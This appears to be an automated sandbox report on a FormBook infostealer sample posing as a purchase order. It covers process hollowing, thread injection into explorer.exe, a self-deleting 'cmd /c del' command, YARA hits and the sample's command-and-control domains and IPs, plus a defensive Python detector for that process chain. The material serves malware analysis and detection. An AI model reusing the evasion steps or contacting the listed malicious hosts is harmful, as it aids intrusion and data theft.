Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039DD380 mov ecx, dword ptr fs:[00000030h] 17_2_039DD380
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03954BAD mov eax, dword ptr fs:[00000030h] 17_2_03954BAD
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F5BA5 mov eax, dword ptr fs:[00000030h] 17_2_039F5BA5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039A53CA mov eax, dword ptr fs:[00000030h] 17_2_039A53CA
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039503E2 mov eax, dword ptr fs:[00000030h] 17_2_039503E2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0394DBE9 mov eax, dword ptr fs:[00000030h] 17_2_0394DBE9
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039E131B mov eax, dword ptr fs:[00000030h] 17_2_039E131B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F8B58 mov eax, dword ptr fs:[00000030h] 17_2_039F8B58
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0392F358 mov eax, dword ptr fs:[00000030h] 17_2_0392F358
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0392DB40 mov eax, dword ptr fs:[00000030h] 17_2_0392DB40
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03953B7A mov eax, dword ptr fs:[00000030h] 17_2_03953B7A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0392DB60 mov ecx, dword ptr fs:[00000030h] 17_2_0392DB60
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0395D294 mov eax, dword ptr fs:[00000030h] 17_2_0395D294
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0393AAB0 mov eax, dword ptr fs:[00000030h] 17_2_0393AAB0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0395FAB0 mov eax, dword ptr fs:[00000030h] 17_2_0395FAB0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039252A5 mov eax, dword ptr fs:[00000030h] 17_2_039252A5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03952ACB mov eax, dword ptr fs:[00000030h] 17_2_03952ACB
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03952AE4 mov eax, dword ptr fs:[00000030h] 17_2_03952AE4
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03925210 mov eax, dword ptr fs:[00000030h] 17_2_03925210
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03925210 mov ecx, dword ptr fs:[00000030h] 17_2_03925210
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0392AA16 mov eax, dword ptr fs:[00000030h] 17_2_0392AA16
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03943A1C mov eax, dword ptr fs:[00000030h] 17_2_03943A1C
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03938A0A mov eax, dword ptr fs:[00000030h] 17_2_03938A0A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03964A2C mov eax, dword ptr fs:[00000030h] 17_2_03964A2C
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039EEA55 mov eax, dword ptr fs:[00000030h] 17_2_039EEA55
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039B4257 mov eax, dword ptr fs:[00000030h] 17_2_039B4257
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03929240 mov eax, dword ptr fs:[00000030h] 17_2_03929240
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0396927A mov eax, dword ptr fs:[00000030h] 17_2_0396927A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039DB260 mov eax, dword ptr fs:[00000030h] 17_2_039DB260
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F8A62 mov eax, dword ptr fs:[00000030h] 17_2_039F8A62
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03952990 mov eax, dword ptr fs:[00000030h] 17_2_03952990
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0395A185 mov eax, dword ptr fs:[00000030h] 17_2_0395A185
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0394C182 mov eax, dword ptr fs:[00000030h] 17_2_0394C182
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039A51BE mov eax, dword ptr fs:[00000030h] 17_2_039A51BE
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039561A0 mov eax, dword ptr fs:[00000030h] 17_2_039561A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039A69A6 mov eax, dword ptr fs:[00000030h] 17_2_039A69A6
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039B41E8 mov eax, dword ptr fs:[00000030h] 17_2_039B41E8
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0392B1E1 mov eax, dword ptr fs:[00000030h] 17_2_0392B1E1
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03929100 mov eax, dword ptr fs:[00000030h] 17_2_03929100
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0395513A mov eax, dword ptr fs:[00000030h] 17_2_0395513A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03944120 mov eax, dword ptr fs:[00000030h] 17_2_03944120
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03944120 mov ecx, dword ptr fs:[00000030h] 17_2_03944120
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0394B944 mov eax, dword ptr fs:[00000030h] 17_2_0394B944
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0392B171 mov eax, dword ptr fs:[00000030h] 17_2_0392B171
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0392C962 mov eax, dword ptr fs:[00000030h] 17_2_0392C962
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03929080 mov eax, dword ptr fs:[00000030h] 17_2_03929080
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039A3884 mov eax, dword ptr fs:[00000030h] 17_2_039A3884
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0395F0BF mov ecx, dword ptr fs:[00000030h] 17_2_0395F0BF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0395F0BF mov eax, dword ptr fs:[00000030h] 17_2_0395F0BF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039520A0 mov eax, dword ptr fs:[00000030h] 17_2_039520A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039690AF mov eax, dword ptr fs:[00000030h] 17_2_039690AF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039BB8D0 mov eax, dword ptr fs:[00000030h] 17_2_039BB8D0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039BB8D0 mov ecx, dword ptr fs:[00000030h] 17_2_039BB8D0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039258EC mov eax, dword ptr fs:[00000030h] 17_2_039258EC
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F4015 mov eax, dword ptr fs:[00000030h] 17_2_039F4015
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039A7016 mov eax, dword ptr fs:[00000030h] 17_2_039A7016
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0395002D mov eax, dword ptr fs:[00000030h] 17_2_0395002D
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0393B02A mov eax, dword ptr fs:[00000030h] 17_2_0393B02A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03940050 mov eax, dword ptr fs:[00000030h] 17_2_03940050
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F1074 mov eax, dword ptr fs:[00000030h] 17_2_039F1074
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039E2073 mov eax, dword ptr fs:[00000030h] 17_2_039E2073
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03938794 mov eax, dword ptr fs:[00000030h] 17_2_03938794
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039A7794 mov eax, dword ptr fs:[00000030h] 17_2_039A7794
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039637F5 mov eax, dword ptr fs:[00000030h] 17_2_039637F5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0394F716 mov eax, dword ptr fs:[00000030h] 17_2_0394F716
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039BFF10 mov eax, dword ptr fs:[00000030h] 17_2_039BFF10
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F070D mov eax, dword ptr fs:[00000030h] 17_2_039F070D
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0395A70E mov eax, dword ptr fs:[00000030h] 17_2_0395A70E
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0395E730 mov eax, dword ptr fs:[00000030h] 17_2_0395E730
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03924F2E mov eax, dword ptr fs:[00000030h] 17_2_03924F2E
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0393EF40 mov eax, dword ptr fs:[00000030h] 17_2_0393EF40
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0393FF60 mov eax, dword ptr fs:[00000030h] 17_2_0393FF60
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F8F6A mov eax, dword ptr fs:[00000030h] 17_2_039F8F6A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039BFE87 mov eax, dword ptr fs:[00000030h] 17_2_039BFE87
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F0EA5 mov eax, dword ptr fs:[00000030h] 17_2_039F0EA5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039A46A7 mov eax, dword ptr fs:[00000030h] 17_2_039A46A7
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F8ED6 mov eax, dword ptr fs:[00000030h] 17_2_039F8ED6
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03968EC7 mov eax, dword ptr fs:[00000030h] 17_2_03968EC7
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039536CC mov eax, dword ptr fs:[00000030h] 17_2_039536CC
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039DFEC0 mov eax, dword ptr fs:[00000030h] 17_2_039DFEC0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039376E2 mov eax, dword ptr fs:[00000030h] 17_2_039376E2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039516E0 mov ecx, dword ptr fs:[00000030h] 17_2_039516E0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0395A61C mov eax, dword ptr fs:[00000030h] 17_2_0395A61C
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0392C600 mov eax, dword ptr fs:[00000030h] 17_2_0392C600
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03958E00 mov eax, dword ptr fs:[00000030h] 17_2_03958E00
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039E1608 mov eax, dword ptr fs:[00000030h] 17_2_039E1608
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039DFE3F mov eax, dword ptr fs:[00000030h] 17_2_039DFE3F
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0392E620 mov eax, dword ptr fs:[00000030h] 17_2_0392E620
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03937E41 mov eax, dword ptr fs:[00000030h] 17_2_03937E41
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039EAE44 mov eax, dword ptr fs:[00000030h] 17_2_039EAE44
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0394AE73 mov eax, dword ptr fs:[00000030h] 17_2_0394AE73
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0393766D mov eax, dword ptr fs:[00000030h] 17_2_0393766D
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0395FD9B mov eax, dword ptr fs:[00000030h] 17_2_0395FD9B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03952581 mov eax, dword ptr fs:[00000030h] 17_2_03952581
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03922D8A mov eax, dword ptr fs:[00000030h] 17_2_03922D8A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03951DB5 mov eax, dword ptr fs:[00000030h] 17_2_03951DB5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F05AC mov eax, dword ptr fs:[00000030h] 17_2_039F05AC
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039535A1 mov eax, dword ptr fs:[00000030h] 17_2_039535A1
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039A6DC9 mov eax, dword ptr fs:[00000030h] 17_2_039A6DC9
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039A6DC9 mov ecx, dword ptr fs:[00000030h] 17_2_039A6DC9
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039D8DF1 mov eax, dword ptr fs:[00000030h] 17_2_039D8DF1
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0393D5E0 mov eax, dword ptr fs:[00000030h] 17_2_0393D5E0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039EFDE2 mov eax, dword ptr fs:[00000030h] 17_2_039EFDE2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0392AD30 mov eax, dword ptr fs:[00000030h] 17_2_0392AD30
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03933D34 mov eax, dword ptr fs:[00000030h] 17_2_03933D34
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039EE539 mov eax, dword ptr fs:[00000030h] 17_2_039EE539
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F8D34 mov eax, dword ptr fs:[00000030h] 17_2_039F8D34
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039AA537 mov eax, dword ptr fs:[00000030h] 17_2_039AA537
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03954D3B mov eax, dword ptr fs:[00000030h] 17_2_03954D3B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03954D3B mov eax, dword ptr fs:[00000030h] 17_2_03954D3B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03954D3B mov eax, dword ptr fs:[00000030h] 17_2_03954D3B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03947D50 mov eax, dword ptr fs:[00000030h] 17_2_03947D50
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03963D43 mov eax, dword ptr fs:[00000030h] 17_2_03963D43
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039A3540 mov eax, dword ptr fs:[00000030h] 17_2_039A3540
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0394C577 mov eax, dword ptr fs:[00000030h] 17_2_0394C577
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0394C577 mov eax, dword ptr fs:[00000030h] 17_2_0394C577
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0393849B mov eax, dword ptr fs:[00000030h] 17_2_0393849B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F8CD6 mov eax, dword ptr fs:[00000030h] 17_2_039F8CD6
Enables debug privileges
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\wlanext.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.bookitstaugustine.com
Source: C:\Windows\explorer.exe Network Connect: 166.62.28.107 80
Source: C:\Windows\explorer.exe Domain query: www.hepimizdostuz.com
Source: C:\Windows\explorer.exe Network Connect: 154.210.110.99 80
Source: C:\Windows\explorer.exe Domain query: www.szmsbk.com
Source: C:\Windows\explorer.exe Domain query: www.merkuryindustries.com
Source: C:\Windows\explorer.exe Domain query: www.pradnyanamaya.com
Source: C:\Windows\explorer.exe Domain query: www.hnchotels.com
Source: C:\Windows\explorer.exe Network Connect: 123.31.43.181 80
Source: C:\Windows\explorer.exe Network Connect: 172.67.132.70 80
Source: C:\Windows\explorer.exe Domain query: www.accessibleageing.com
Source: C:\Windows\explorer.exe Network Connect: 3.223.115.185 80
Source: C:\Windows\explorer.exe Network Connect: 81.88.57.70 80
Source: C:\Windows\explorer.exe Domain query: www.thelandcle.com
Source: C:\Windows\explorer.exe Network Connect: 198.185.159.144 80
Source: C:\Windows\explorer.exe Domain query: www.beyju.store
Source: C:\Windows\explorer.exe Domain query: www.theskineditco.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Network Connect: 185.199.108.153 80
Source: C:\Windows\explorer.exe Network Connect: 85.17.172.1 80
Source: C:\Windows\explorer.exe Domain query: www.tuyensinhhaiphong.com
Source: C:\Windows\explorer.exe Network Connect: 52.15.160.167 80
Source: C:\Windows\explorer.exe Domain query: www.belatopapparel.xyz
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Thread register set: target process: 3424
Source: C:\Windows\SysWOW64\wlanext.exe Thread register set: target process: 3424
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: E50000
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process created: C:\Users\user\Desktop\PO45937008ADENGY.exe C:\Users\user\Desktop\PO45937008ADENGY.exe
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process created: C:\Users\user\Desktop\PO45937008ADENGY.exe C:\Users\user\Desktop\PO45937008ADENGY.exe
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process created: C:\Users\user\Desktop\PO45937008ADENGY.exe C:\Users\user\Desktop\PO45937008ADENGY.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: C:\Windows\SysWOW64\wlanext.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO45937008ADENGY.exe'
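The process chain recorded in the evidence above (the sample re-launching itself and running cmd.exe /c timeout 1, the injected explorer.exe starting wlanext.exe, and wlanext.exe running cmd.exe /c del against the original file) is the part of this report that carries over into endpoint detection logic. The Python below is an added example, not part of the report or of the sandbox; it runs three checks over a constructed list of process-creation events modelled on that chain. The PIDs and the event layout are made up; the image paths and command lines are the ones listed above. The explorer.exe-to-SysWOW64 check is a heuristic scoped to this chain, not a general-purpose rule.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full image path of the new process
    cmdline: str    # command line as logged


# Constructed process-creation events modelled on the chain in this report:
# sample -> itself / cmd.exe, injected explorer.exe -> wlanext.exe -> cmd.exe /c del.
# PIDs are invented; images and command lines are the ones the report lists.
EVENTS = [
    ProcEvent(1000, 4,    r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(3000, 1000, r"C:\Users\user\Desktop\PO45937008ADENGY.exe",
              r"C:\Users\user\Desktop\PO45937008ADENGY.exe"),
    ProcEvent(3004, 3000, r"C:\Windows\SysWOW64\cmd.exe",
              r"'C:\Windows\System32\cmd.exe' /c timeout 1"),
    ProcEvent(3008, 3004, r"C:\Windows\SysWOW64\timeout.exe", "timeout 1"),
    ProcEvent(3012, 3000, r"C:\Users\user\Desktop\PO45937008ADENGY.exe",
              r"C:\Users\user\Desktop\PO45937008ADENGY.exe"),
    ProcEvent(4100, 1000, r"C:\Windows\SysWOW64\wlanext.exe", "wlanext.exe"),
    ProcEvent(5000, 4100, r"C:\Windows\SysWOW64\cmd.exe",
              r"/c del 'C:\Users\user\Desktop\PO45937008ADENGY.exe'"),
    ProcEvent(5004, 5000, r"C:\Windows\SysWOW64\conhost.exe", "conhost.exe"),
]

# "del <path>" with the path optionally wrapped in single or double quotes.
DEL_RE = re.compile(r"\bdel\s+['\"]?([^'\"]+?)['\"]?\s*$", re.IGNORECASE)


def _name(path):
    return path.rsplit("\\", 1)[-1].lower()


def _by_pid(events):
    return {e.pid: e for e in events}


def ancestry(events, pid):
    """Image names from the root of the tree down to pid."""
    by_pid = _by_pid(events)
    chain = []
    while pid in by_pid:
        chain.append(_name(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return list(reversed(chain))


def find_self_spawn(events):
    """A binary under \\Users\\ starting a second copy of its own image."""
    by_pid = _by_pid(events)
    return [e.pid for e in events
            if e.ppid in by_pid
            and by_pid[e.ppid].image.lower() == e.image.lower()
            and "\\users\\" in e.image.lower()]


def find_shell_to_wow64(events):
    """explorer.exe launching a 32-bit system binary out of SysWOW64 (heuristic):
    this is where the hollowed wlanext.exe appears in the report's chain."""
    by_pid = _by_pid(events)
    return [e.pid for e in events
            if e.ppid in by_pid
            and _name(by_pid[e.ppid].image) == "explorer.exe"
            and "\\syswow64\\" in e.image.lower()]


def find_self_delete(events):
    """cmd.exe deleting a file that already ran as a process in the same event stream."""
    ran = {e.image.lower() for e in events}
    hits = []
    for e in events:
        if _name(e.image) != "cmd.exe":
            continue
        m = DEL_RE.search(e.cmdline)
        if m and m.group(1).strip().lower() in ran:
            hits.append((e.pid, m.group(1).strip()))
    return hits


def analyze(events):
    return {
        "self_spawn": find_self_spawn(events),
        "shell_to_wow64": find_shell_to_wow64(events),
        "self_delete": find_self_delete(events),
    }


if __name__ == "__main__":
    for kind, hits in analyze(EVENTS).items():
        for hit in hits:
            pid = hit[0] if isinstance(hit, tuple) else hit
            print(f"{kind}: pid {pid}, chain {' -> '.join(ancestry(EVENTS, pid))}")
```

The self-delete check is the most portable of the three: it does not depend on the hollowing target (wlanext.exe here) and only needs the deleted path to match the image of a process seen earlier, which is exactly what the report's last "Process created" line shows.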
Source: explorer.exe, 0000000C.00000002.914070199.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
Source: explorer.exe, 0000000C.00000002.915192555.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000011.00000002.916038112.0000000005F20000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 0000000C.00000002.915192555.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000011.00000002.916038112.0000000005F20000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000C.00000002.915192555.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000011.00000002.916038112.0000000005F20000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000000C.00000002.915192555.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000011.00000002.916038112.0000000005F20000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 0000000C.00000000.695029841.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Queries volume information: C:\Users\user\Desktop\PO45937008ADENGY.exe VolumeInformation
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.914080397.0000000002ED0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.914486268.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.714806993.00000000012C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 9.2.PO45937008ADENGY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.PO45937008ADENGY.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.914080397.0000000002ED0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.914486268.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.714806993.00000000012C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 9.2.PO45937008ADENGY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.PO45937008ADENGY.exe.400000.0.raw.unpack, type: UNPACKEDPE
Behavior Graph (ID: 383974, Sample: PO45937008ADENGY.exe, Startdate: 08/04/2021, Architecture: WINDOWS, Score: 100), rendered as a process tree; bracketed numbers are the graph's created-files / registry-values counters as printed:

Start
  DNS/IP: www.softballlyfe.com; www.helpmewithmyenergy.com; 2 other IPs or domains
  Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 4 other signatures
  PO45937008ADENGY.exe [15 4] (started)
    DNS/IP: 104.21.56.119 port 443 from local port 49727 (CLOUDFLARENETUS, United States); myliverpoolnews.cf 172.67.150.212 port 80 from local port 49726 (CLOUDFLARENETUS, United States)
    Signatures: Tries to detect virtualization through RDTSC time measurements; Hides threads from debuggers
    PO45937008ADENGY.exe (started)
      Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
      explorer.exe (injected)
        DNS/IP: tuyensinhhaiphong.com 123.31.43.181 port 80 from local port 49771 (VNPT-AS-VNVNPTCorpVN, Viet Nam); onstatic-pt.setupdns.net 81.88.57.70 port 80 from local port 49764 (REGISTER-ASIT, Italy); 20 other IPs or domains
        Signatures: System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation
        wlanext.exe (started)
          Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
          cmd.exe [1] (started)
            conhost.exe (started)
    cmd.exe [1] (started)
      conhost.exe (started)
      timeout.exe [1] (started)
    WerFault.exe [23 9] (started)
    2 other processes

Contacted Public IPs

IP | Domain | Country | ASN | ASN Name | Malicious
166.62.28.107 | accessibleageing.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true
154.210.110.99 | www.szmsbk.com | Seychelles | 54600 | PEGTECHINCUS | true
123.31.43.181 | tuyensinhhaiphong.com | Viet Nam | 45899 | VNPT-AS-VNVNPTCorpVN | true
172.67.132.70 | www.belatopapparel.xyz | United States | 13335 | CLOUDFLARENETUS | true
172.67.150.212 | myliverpoolnews.cf | United States | 13335 | CLOUDFLARENETUS | false
3.223.115.185 | HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | United States | 14618 | AMAZON-AESUS | false
